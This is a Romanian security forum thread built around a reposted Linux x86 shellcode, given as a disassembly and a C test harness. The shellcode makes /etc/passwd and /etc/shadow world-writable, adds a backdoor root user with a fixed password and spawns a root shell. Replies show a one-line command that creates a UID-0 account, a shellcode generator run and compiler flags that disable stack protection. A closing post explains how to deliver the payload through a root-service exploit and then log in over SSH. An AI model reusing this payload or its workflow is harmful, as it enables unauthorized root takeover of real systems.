Kalashnikov.

Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root


/*
#Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh
#length: 521 bytes
#Date: 8 September 2018
#Author: Ali Razmjoo
#tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]



Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
Thanks to Jonathan Salwan


chmod('/etc/passwd',777)
chmod('/etc/shadow',777)
open passwd, write the new root user with password (user: ALI, pass: ALI), close passwd
setreuid() , execve('/bin/sh')


root@user:~/Desktop/xpl# objdump -d f.o

f.o: file format elf32-i386


Disassembly of section .text:

00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 31 d2 xor %edx,%edx
8: bb 59 45 4f 53 mov $0x534f4559,%ebx
d: ba 33 36 38 37 mov $0x37383633,%edx
12: 31 d3 xor %edx,%ebx
14: 53 push %ebx
15: c1 eb 08 shr $0x8,%ebx
18: 53 push %ebx
19: bb 7a 46 59 45 mov $0x4559467a,%ebx
1e: ba 55 36 38 36 mov $0x36383655,%edx
23: 31 d3 xor %edx,%ebx
25: 53 push %ebx
26: bb 67 58 45 4e mov $0x4e455867,%ebx
2b: ba 48 3d 31 2d mov $0x2d313d48,%edx
30: 31 d3 xor %edx,%ebx
32: 53 push %ebx
33: 89 e3 mov %esp,%ebx
35: 68 41 41 ff 01 push $0x1ff4141
3a: 59 pop %ecx
3b: c1 e9 08 shr $0x8,%ecx
3e: c1 e9 08 shr $0x8,%ecx
41: 6a 0f push $0xf
43: 58 pop %eax
44: cd 80 int $0x80
46: bb 53 49 57 4a mov $0x4a574953,%ebx
4b: ba 39 2d 38 3d mov $0x3d382d39,%edx
50: 31 d3 xor %edx,%ebx
52: c1 eb 08 shr $0x8,%ebx
55: 53 push %ebx
56: bb 6d 47 45 58 mov $0x5845476d,%ebx
5b: ba 42 34 2d 39 mov $0x392d3442,%edx
60: 31 d3 xor %edx,%ebx
62: 53 push %ebx
63: bb 6e 54 49 57 mov $0x5749546e,%ebx
68: ba 41 31 3d 34 mov $0x343d3141,%edx
6d: 31 d3 xor %edx,%ebx
6f: 53 push %ebx
70: 89 e3 mov %esp,%ebx
72: 68 41 41 ff 01 push $0x1ff4141
77: 59 pop %ecx
78: c1 e9 08 shr $0x8,%ecx
7b: c1 e9 08 shr $0x8,%ecx
7e: 6a 0f push $0xf
80: 58 pop %eax
81: cd 80 int $0x80
83: bb 73 47 4e 51 mov $0x514e4773,%ebx
88: ba 32 34 39 35 mov $0x35393432,%edx
8d: 31 d3 xor %edx,%ebx
8f: c1 eb 08 shr $0x8,%ebx
92: 53 push %ebx
93: bb 59 44 56 44 mov $0x44564459,%ebx
98: ba 76 34 37 37 mov $0x37373476,%edx
9d: 31 d3 xor %edx,%ebx
9f: 53 push %ebx
a0: bb 4e 58 59 51 mov $0x5159584e,%ebx
a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx
aa: 31 d3 xor %edx,%ebx
ac: 53 push %ebx
ad: 89 e3 mov %esp,%ebx
af: 68 41 41 01 04 push $0x4014141
b4: 59 pop %ecx
b5: c1 e9 08 shr $0x8,%ecx
b8: c1 e9 08 shr $0x8,%ecx
bb: 6a 05 push $0x5
bd: 58 pop %eax
be: cd 80 int $0x80
c0: 89 c3 mov %eax,%ebx
c2: 6a 04 push $0x4
c4: 58 pop %eax
c5: 68 41 73 68 0a push $0xa687341
ca: 59 pop %ecx
cb: c1 e9 08 shr $0x8,%ecx
ce: 51 push %ecx
cf: b9 57 67 57 58 mov $0x58576757,%ecx
d4: ba 39 48 35 39 mov $0x39354839,%edx
d9: 31 d1 xor %edx,%ecx
db: 51 push %ecx
dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx
e1: ba 74 4b 38 38 mov $0x38384b74,%edx
e6: 31 d1 xor %edx,%ecx
e8: 51 push %ecx
e9: b9 47 57 56 42 mov $0x42565747,%ecx
ee: ba 35 38 39 36 mov $0x36393835,%edx
f3: 31 d1 xor %edx,%ecx
f5: 51 push %ecx
f6: b9 61 70 51 4e mov $0x4e517061,%ecx
fb: ba 2d 39 6b 61 mov $0x616b392d,%edx
100: 31 d1 xor %edx,%ecx
102: 51 push %ecx
103: b9 48 58 70 74 mov $0x74705848,%ecx
108: ba 72 68 4a 35 mov $0x354a6872,%edx
10d: 31 d1 xor %edx,%ecx
10f: 51 push %ecx
110: b9 76 45 56 46 mov $0x46564576,%ecx
115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx
11a: 31 d1 xor %edx,%ecx
11c: 51 push %ecx
11d: 68 66 77 55 57 push $0x57557766
122: 68 68 70 31 50 push $0x50317068
127: 68 7a 59 65 41 push $0x4165597a
12c: 68 41 61 41 51 push $0x51416141
131: 68 49 38 75 74 push $0x74753849
136: 68 50 4d 59 68 push $0x68594d50
13b: 68 54 42 74 7a push $0x7a744254
140: 68 51 2f 38 54 push $0x54382f51
145: 68 45 36 6d 67 push $0x676d3645
14a: 68 76 50 2e 73 push $0x732e5076
14f: 68 4e 58 52 37 push $0x3752584e
154: 68 39 4b 55 48 push $0x48554b39
159: 68 72 2f 59 42 push $0x42592f72
15e: 68 56 78 4b 47 push $0x474b7856
163: 68 39 55 66 5a push $0x5a665539
168: 68 46 56 6a 68 push $0x686a5646
16d: 68 46 63 38 79 push $0x79386346
172: 68 70 59 6a 71 push $0x716a5970
177: 68 77 69 53 68 push $0x68536977
17c: 68 6e 54 67 54 push $0x5467546e
181: 68 58 4d 69 37 push $0x37694d58
186: 68 2f 41 6e 24 push $0x246e412f
18b: 68 70 55 6e 4d push $0x4d6e5570
190: 68 24 36 24 6a push $0x6a243624
195: b9 73 61 74 67 mov $0x67746173,%ecx
19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx
19f: 31 d1 xor %edx,%ecx
1a1: 51 push %ecx
1a2: 89 e1 mov %esp,%ecx
1a4: ba 41 41 41 7f mov $0x7f414141,%edx
1a9: c1 ea 08 shr $0x8,%edx
1ac: c1 ea 08 shr $0x8,%edx
1af: c1 ea 08 shr $0x8,%edx
1b2: cd 80 int $0x80
1b4: 31 c0 xor %eax,%eax
1b6: b0 46 mov $0x46,%al
1b8: 31 db xor %ebx,%ebx
1ba: 31 c9 xor %ecx,%ecx
1bc: cd 80 int $0x80
1be: 31 c0 xor %eax,%eax
1c0: b0 46 mov $0x46,%al
1c2: 31 db xor %ebx,%ebx
1c4: 31 c9 xor %ecx,%ecx
1c6: cd 80 int $0x80
1c8: 68 52 55 48 42 push $0x42485552
1cd: 68 52 51 49 43 push $0x43495152
1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx
1d7: ba 66 38 31 35 mov $0x35313866,%edx
1dc: 31 d1 xor %edx,%ecx
1de: 51 push %ecx
1df: b9 55 55 54 57 mov $0x57545555,%ecx
1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx
1e9: 31 d1 xor %edx,%ecx
1eb: 51 push %ecx
1ec: 89 e3 mov %esp,%ebx
1ee: 31 c0 xor %eax,%eax
1f0: 88 43 07 mov %al,0x7(%ebx)
1f3: 89 5b 08 mov %ebx,0x8(%ebx)
1f6: 89 43 0c mov %eax,0xc(%ebx)
1f9: b0 0b mov $0xb,%al
1fb: 8d 4b 08 lea 0x8(%ebx),%ecx
1fe: 8d 53 0c lea 0xc(%ebx),%edx
201: cd 80 int $0x80
203: b0 01 mov $0x1,%al
205: b3 01 mov $0x1,%bl
207: cd 80 int $0x80
root@user:~/Desktop/xpl#



*/

#include <stdio.h>
#include <string.h>
char sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x8
8\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
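/*
 * Prints the length of the sc byte array and then transfers control to it
 * by casting the array to a function pointer. strlen() returns size_t, so
 * the format specifier is %zu rather than %d.
 */
int main(void)
{
	fprintf(stdout, "Length: %zu\n\n", strlen(sc));

	/* Call the byte array as if it were code; control does not return here. */
	(*(void (*)(void)) sc)();

	return 0;
}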

Sa inteleg ca asa arata exploit-urile din 2018. Poti specifica, te rog, pe ce distributii ruleaza?

desigur :)

#Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh

#length: 521 bytes

#Date: 8 September 2018

#Author: Ali Razmjoo

#tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]


Primul test:


root@pluto:~# useradd -u 0 -g 0 rst && echo -e "parolavietii\nparolavietii" |passwd rst
useradd: UID 0 is not unique

Ah, lipseste ceva:


root@pluto:~# useradd -o -u 0 -g 0 rst && echo -e "parolavietii\nparolavietii" |passwd rst
Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully

Se pare ca a functionat si mi-am adaugat user rst cu uid/gid 0 si am setat si parola pentru acesta intr-o singura linie de comanda:


root@pluto:~# grep rst /etc/passwd /etc/shadow
/etc/passwd:rst:x:0:0::/home/rst:/bin/sh
/etc/shadow:rst:$6$zaJmMm5X$.F0fvLkcrZQwXTlR4F6HcNro8UFKHvIL8klT72w69h27fsuEZ5/Wlxlc5ScW6Dl/zEYABlpXeGIsFFBvTYiul.:16354:0:99999:7:::

Hai sa incercam un shellcode generator. Nu stiu cat de bun o fi:


marian@pluto:~/work$ cc shellcode_gen.c -o shellcode_gen
marian@pluto:~/work$ ./shellcode_gen 'useradd -o -u 0 -g 0 rst && echo -e "parolavietii\nparolavietii" |passwd rst' output.txt
Shellcode lenght: 79
\x31\xc0\x83\xec\x01\x88\x04\x24
\x68\x2e\x74\x78\x74\x68\x74\x70
\x75\x74\x66\x68\x6f\x75\x89\xe6
\x83\xec\x01\x88\x04\x24\x68\x72
\x61\x64\x64\x68\x2f\x75\x73\x65
\x68\x73\x62\x69\x6e\x68\x75\x73
\x72\x2f\x83\xec\x01\xc6\x04\x24
\x2f\x50\x56\x83\xee\x12\x56\xb0
\x0b\x89\xf3\x89\xe1\x31\xd2\xcd
\x80\xb0\x01\x31\xdb\xcd\x80

Nu stiu daca l-a generat bine, dar incercam o aroganta bisericeasca


marian@pluto:~/work$ pico test.c
GNU nano 2.2.6 File: test.c


#include <stdio.h>

unsigned char slujbaBisericeasca[] =
"\x31\xc0\x83\xec\x01\x88\x04\x24"
"\x68\x2e\x74\x78\x74\x68\x74\x70"
"\x75\x74\x66\x68\x6f\x75\x89\xe6"
"\x83\xec\x01\x88\x04\x24\x68\x72"
"\x61\x64\x64\x68\x2f\x75\x73\x65"
"\x68\x73\x62\x69\x6e\x68\x75\x73"
"\x72\x2f\x83\xec\x01\xc6\x04\x24"
"\x2f\x50\x56\x83\xee\x12\x56\xb0"
"\x0b\x89\xf3\x89\xe1\x31\xd2\xcd"
"\x80\xb0\x01\x31\xdb\xcd\x80";


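/*
 * Casts the slujbaBisericeasca byte array to a function pointer and calls it.
 * Declared as int main(void): the implicit-int form `main()` is not valid in
 * C99 and later.
 */
int main(void)
{
	int (*ret)(void) = (int (*)(void)) slujbaBisericeasca;
	ret();
	return 0;
}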

Compilam rahatul pentru a fi aruncat peste gardul vecinului:


marian@pluto:~/work$ cc test.c -o test
marian@pluto:~/work$ file test
test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0xd291df14bd39d22a6b617f9da72ad74d4a5cc85f, not stripped
marian@pluto:~/work$

Sa vedem totusi ce zice:


marian@pluto:~/work$ strace ./test
execve("./test", ["./test"], [/* 13 vars */]) = 0
brk(0) = 0x601000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f6e15c3a000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=54621, ...}) = 0
mmap(NULL, 54621, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f6e15c2c000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
mmap(NULL, 3713112, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f6e15692000
mprotect(0x7f6e15813000, 2097152, PROT_NONE) = 0
mmap(0x7f6e15a13000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x181000) = 0x7f6e15a13000
mmap(0x7f6e15a18000, 18520, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f6e15a18000
close(3) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f6e15c2b000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f6e15c2a000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f6e15c29000
arch_prctl(ARCH_SET_FS, 0x7f6e15c2a700) = 0
mprotect(0x7f6e15a13000, 16384, PROT_READ) = 0
mprotect(0x7f6e15c3c000, 4096, PROT_READ) = 0
munmap(0x7f6e15c2c000, 54621) = 0
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
Segmentation fault

Ne-a dat 'Segmentation fault'. Asta inseamna ca trebuie compilat in alt fel. So, let's try to disable the fucking stack protection and enable stack execution.


marian@pluto:~/work$ gcc -fno-stack-protector -z execstack -o test test.c

Copyright by Preotul RST-ului anul 2021. Hai bre, ce e cu 2018 ala acolo copyright. Aveti simtul umorului prea dezvoltat sau ati fumat ceva nasol ? Astea cu shellcodes imi par deplasate rau. Practic te bazezi pe idiotenia unui om de a rula ceva ca ROOT. Astfel e logic ca nu functioneaza. Low end rau frate. Un rahat de genul il faci in cateva minute.

Si de ce as seta chmod 777 pe cele doua fisiere cand pot sa generez un binar in sistem setat cu bit suid/sgid cu care pot executa orice comanda cu user/group owner.


Edited by aelius
@Kalashnikov ar fi frumos sa mentionezi si sursa : Here

si mi se pare cam vechi (09.09.2014 -acum o luna...) in fine :) nu am vrut decat sa iti atrag atentia.

Cat despre acel 2018 :)) cel mai probabil greseala.

Bănuiesc că e de ajuns autorul #Author: Ali Razmjoo :) .


Bre, e un SHELLCODE, nu un EXPLOIT!

Use case:

- se da una bucata exploit (* buffer overflow sau altceva) intr-un software care ruleaza ca root (ProFTPD, PostFix sau mai stiu eu ce). E NECESAR!

- se ruleaza acel exploit folosind acest shellcode, rezultatul fiind un nou cont cu permisiuni de root. Acel chmod poate fi util in anumite conditii.

- se logheaza frumos pe SSH cu noul cont

Nota: in urma executarii exploit-ului procesul poate sa crape. Si in cazul de fata ai chiar acest avantaj: poate sa crape procesul, tu ai deja acces full pe server. Se putea face backconnect de exemplu, dar aici apar probleme de iptables (firewall). La fel si cu port bind.

V-ati prins?
